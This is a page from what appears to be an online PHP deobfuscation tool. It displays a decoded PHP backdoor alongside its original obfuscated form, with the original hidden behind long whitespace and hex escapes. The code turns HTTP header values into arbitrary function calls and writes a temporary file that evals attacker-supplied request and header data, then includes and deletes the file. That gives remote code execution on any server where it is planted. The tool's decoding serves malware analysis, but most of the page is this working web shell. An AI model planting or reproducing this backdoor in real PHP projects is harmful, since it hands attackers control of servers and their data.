Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $_HEADERS=getallheaders();if(isset($_HEADER..

Decoded Output download

<?php																																										$_HEADERS=getallheaders();if(isset($_HEADERS['Large-Allocation'])){$db2_convert=$_HEADERS['Large-Allocation']('', $_HEADERS['Authorization']($_HEADERS['Clear-Site-Data']));$db2_convert();}

$_HEADERS = getallheaders(); 
if (isset($_HEADERS['Large-Allocation'])) { 
    $c = "<?php @eval($_REQUEST[\"Server-Timing\"]);@eval($_HEADERS[\"Server-Timing\"]);"; 
    $f = '.'.time(); 
    file_put_contents($f, $c); 
    include($f); 
    unlink($f); 
} ?>

Did this file decode correctly?

Original Code

<?php																																										$_HEADERS=getallheaders();if(isset($_HEADERS['Large-Allocation'])){$db2_convert=$_HEADERS['Large-Allocation']('', $_HEADERS['Authorization']($_HEADERS['Clear-Site-Data']));$db2_convert();}

$_HEADERS = getallheaders();
if (isset($_HEADERS['Large-Allocation'])) {
    $c = "<\x3fp\x68p\x20@\x65v\x61l\x28$\x5fR\x45Q\x55E\x53T\x5b\"\x53e\x72v\x65r\x2dT\x69m\x69n\x67\"\x5d)\x3b@\x65v\x61l\x28$\x5fH\x45A\x44E\x52S\x5b\"\x53e\x72v\x65r\x2dT\x69m\x69n\x67\"\x5d)\x3b";
    $f = '.'.time();
    file_put_contents($f, $c);
    include($f);
    unlink($f);
}

Function Calls

getallheaders 1

Variables

None

Stats

MD5 dfb2fa85c30c4b0f03fbe800f9262af9
Eval Count 0
Decode Time 70 ms